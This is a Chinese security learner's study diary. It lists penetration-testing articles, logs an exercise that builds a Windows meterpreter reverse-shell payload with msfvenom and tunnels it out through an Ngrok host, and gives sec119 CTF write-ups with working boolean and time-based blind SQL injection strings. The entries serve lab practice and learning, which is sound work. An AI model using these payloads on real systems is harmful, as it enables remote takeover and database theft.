侯欣悦学习日记

wholesome

Web爬虫浅析
​

一次与sql注入 & webshell 的美丽“邂逅”
PHP反序列化漏洞说明
序列化和反序列化漏洞的简单理解
Java反序列化漏洞成因与利用分析
PHP文件包含漏洞利用思路与Bypass总结手册（一）
PHP文件包含漏洞利用思路与Bypass总结手册（二）
（上面两个文件包含，我需要再实践实践）
Web漏洞 | 文件包含漏洞
ThinkCMF缓存Getshell
​
基本ROP讲解
​

​

​

​

​

​
Ninja：一款专为隐藏红队活动的开源C2服务器
内网渗透初识—信息收集
XSS之Beef神器
​
如何编写出一个合格的RCE POC

​浅谈 windows 命名管道
​

​

​

​
2020攻防演练弹药库-您有主机上线请注意

wholesome

5.5.2020

今天空闲的时间看了《Metaspolit下配合Ngrok同时实现内网反弹+转发》发现这篇文章最开始就吸引了我：

​
这个特别符合我的情况，内网到内网，一直是我的一个疑惑点，所以鱼和熊掌我也都要！

一、Ngrok（基于Go语言编写）

首先了解这个工具吧！这个工具很重要来着。

注册：

​

登录：

​开通隧道：

​

根据自己的系统下载客户端：

​

下载后解压到虚拟机：

​

1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=wholesome.free.idcfengye.com LPORT=4443 -f exe -a x86 --platform win -o gong32.exe

复制代码

​

然后又在kali中运行Ngrok的客户端：

​

回车执行：

​

接下来配置监听：

​

​刚想下载到windows10：

​

发给对方：

​

小伙伴执行之后：

​这是成功了还是失败了？我觉得我应该成功了，

卡住不动了，再来，exit：

​

还有session没有关闭，好激动：

​

但是我发现交互不了：

​

但是小伙伴的执行，她成功得到了我的shell:

​

所以我重新来一遍，然而重来几遍都不行！甚至连我局域网内执行都不可以！

昨天没成功，重新开通一个隧道，改成tcp（昨天是http）：

​

Kali生成反弹木马：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10145 -f exe --platform win -o 32.exe

​

启动隧道：

./sunny clientid 5e7b1cb532c5c0b5

​

纠结了半天，原来是kali断网了。

重启终于有网：

​

这次终于成功了：

​

wholesome

深入理解静态变量
2020年黑客常用-最佳数据包嗅探工具（详解）
linux pwn入门学习到放弃
Metaspolit下配合Ngrok同时实现内网反弹+转发
细说渗透江湖之柳暗花明又一村
技术人的修炼之道：从业余到专业
今天你pwn了吗（上）
总结一些网站加密和混淆技术
你离黑客的距离,就差这20个神器了
Lcx的多种用法：3个功能+9个参数，你会怎么玩？
利用 mstsc 反向攻击思路整理
通过代码重用攻击绕过现代XSS防御
小白入门学习内网之横向渗透攻击流程
PHP文件包含漏洞利用思路与Bypass总结手册（完结）
【渗透测试】基于后期的权限维持
利用Windows的SEH学习Egg Hunter
[翻译]利用 QuickZip 4.60 的缓冲区溢出漏洞在 Win7 X64 系统上弹出计算器
WoW64 Egghunter

wholesome

sec119第一关：显错注入

工具：firefox

只能说好久没有练习SQL注入了，以至于最开始一点都不熟练。

看看别人怎么做的吧！

通过id变换，可以发现页面的一点点变化，当id=2时：

首先最直接的反应是单引号：

值得注意的是，经过我的实验发现，网站过滤了注释符“#”、“-- ”：

接下来开始猜测字段数了：

最后可以知晓字段数为2。

现在就开始测试回显在第几列：

既然在第二列，那么我们就可以利用这个地方回显出我们需要的东西，获取当前用户，数据库版本，当前数据库，数据库路径：

接下来就是爆表了：

其中有一个flag表：

接下来爆值：

得到flag：

wholesome

sec119第二关：布尔注入

布尔注入与上面报错注入不一样，页面没有回显字段：

当order by<=2时，我们视为正确返回，但是当order by=3时，我们的界面返回有变化，由此确定字段个数为2。

注意，由于布尔盲注一般没有回显字段，所以就不支持联合查询。

此时我们构造SQL语句，利用and，or等关键字来其后的语句 true 、 false使web页面返回true或者false，从而达到注入的目的来获取信息。

猜解当前数据库的长度：

一直测试到5，此时我们发现页面可以正常显示：数据库长度为5。

现在就是开始猜测数据库名称了，从左到右截取字符串：

接下来又固定w，测试第二个字符：

再试：

最后循环测试（工作量比较大），得到数据库名字为webug：

当然除了用left函数猜测，还可以使用substr函数爆出：

最后也会得到webug数据库名。

此外，如果也可以用< 、>符号来比较查找，找到一个范围，最后再确定，如：

此时我们就可以确定第二个字符为e。

接下来爆当前数据库存在的表的数量：

7个表，接下来每个表都要爆出表长和表名。这个工作量太大了先猜测第一个表的长度吧：

?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1)))=9%23

第一个表的长度为9。

注意：括号一个也不能少。

同理，此时我们可以猜测其他表的长度：

以此类推，7个表的长度分别为：9/8/8/4/12/4/9

接下来测试每个表的名称了：

?id=1' and (substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>'a'%23

最后测出第一个表的首字母为d：

第二个字符为a。

......

由此类推。测出每个表的名称。

最后，如果花费时间爆表的话，我们能够知道这些表的名称和第一关一样，这里我就贴出第一关表的结果：

正常原理来说，还是flag，不知道里面的flag是否是动态的。那我们直接测试flag表：

先求指定表中列的数量：

然后猜解每一列的名字：

?id=1' and (substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),1,1))='i'%23

以此类推，猜解出两列的名称id，flag

然后猜解id列里面字段的数量和名称，显示只有一个1，接下来对应id=1猜解flag列的内容长度和值：

?id=1' and (length((select flag from flag where id=1)))=16%23

第一个字母为d，由此猜测16个字母为：dfafdasfafdsadfa。与第一关的flag一致。提交之后是错误的：

那么flag不应该在这个表。

七个表！一个一个猜解？总之思路就这样，考虑到时间，我就不写了！

wholesome

sec119第三关：延时注入

延时注入适用于，无法回现和无法显示错误页面的场景，此时我们可以利用sleep()函数让服务器休眠，通过休眠时间判断执行的语句对错，从而得到我们想要的信息。

那么怎么判断呢？这个时候我们就要用到if()函数和sleep()函数了。if(a,b,c)条件判断函数：if判断句，a为条件，b、c为执行语句；如果a为真就执行b，a为假就执行c;

?id=1' and if(length(database())=1,0,sleep(3))%23

所以时间长度为5。

测试数据库名称：

?id=1' and if(substr(database(),1,1)='w',0,sleep(3))%23

所以数据库名的第一个字符为：“w”

当然，为了方便，我们也可以采用left函数：

这个时候测试猜解就比较容易看到已经猜解的字符：

?id=1' and if(left(database(),5)='webug',0,sleep(3))%23

最后猜解出数据库名webug：

接下来就要猜解数据库里面的表的个数：

?id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=7,0,sleep(3))%23

猜解表名：

?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='c',0,sleep(3))%23

接着尝试：

由此可知，第一个字符为：“d”

依次类推，爆出webug下的表：

data_crud,env_list,env_path,flag,sqlinjection,user,user_test

利用延时注入爆env_list表下的列：

?id=1' and if(left((select column_name from information_schema.columns where table_name='env_list' limit 0,1),1)='i',0,sleep(3))%23

env_list的表里有：

id,envName,envDesc,envIntegration,delFlag,envFlag,level,type

需要是的注意的是，由于这里是第三关，所以我们利用延时注入爆id=3时envFlag内容：

?id=1' and if(substr((select EnvFlag from env_list where id=3),1,1)='g',0,sleep(3))%23

flag第一个字符为g，为了方便使用left函数：

最后flag为：gfdgdfsdg

wholesome

通达OA前台任意用户伪造登录漏洞复现
亲手实践图片木马
一条网站攻击日志分析引发的思考
二维码劫持案例分析
细说渗透江湖之出荆棘入深林
云WAF概述
如何养成良好的渗透测试项目管理习惯
记一次渗透实战
红队攻防之邮箱打点入口

wholesome

今天sec119做到十四关左右，结果不小心WPS突然卡了，卡了半天，最后强制关闭，全没了！嗯！然后笔记丢失了

wholesome

一次敏感信息泄露引发的逻辑漏洞挖掘
一文详解Webshell
一次SQL注入到代码审计之路
Gopher协议在SSRF漏洞中的深入研究
文件上传漏洞和Caidao入门及防御原理（一）
一次曲折的渗透测试之旅
.htaccess利用与Bypass方式总结
内网渗透之内网穿透
内网端口转发工具的使用总结
资产收集的方法总结
【前端黑客】XSS入门
那些可以绕过WAF的各种特性
渗透测试 | 从外网到内网的渗透姿势分享
记一次HW实战笔记 | 艰难的提权爬坑

wholesome

看雪工具
红队技巧：仿冒Windows登录
AWD 常规流程和操作
通过PING tunnel 转换 beacon 流量
回忆杀-特征码免杀实践
你的HW文章搜索包 | 好用的安全类文章武器库
绕过HSTS继续抓包
APP渗透｜看我如何在APP中getshell
蓝军必须知道的二三事
关于站库分离渗透思路总结
bypass 360 meterpreter 免杀技巧
msfpc适合懒人的渗透工具
cryptopals解密之旅 （一）
浅析phar反序列化漏洞攻击及实战
黑客Web武器大集结（上）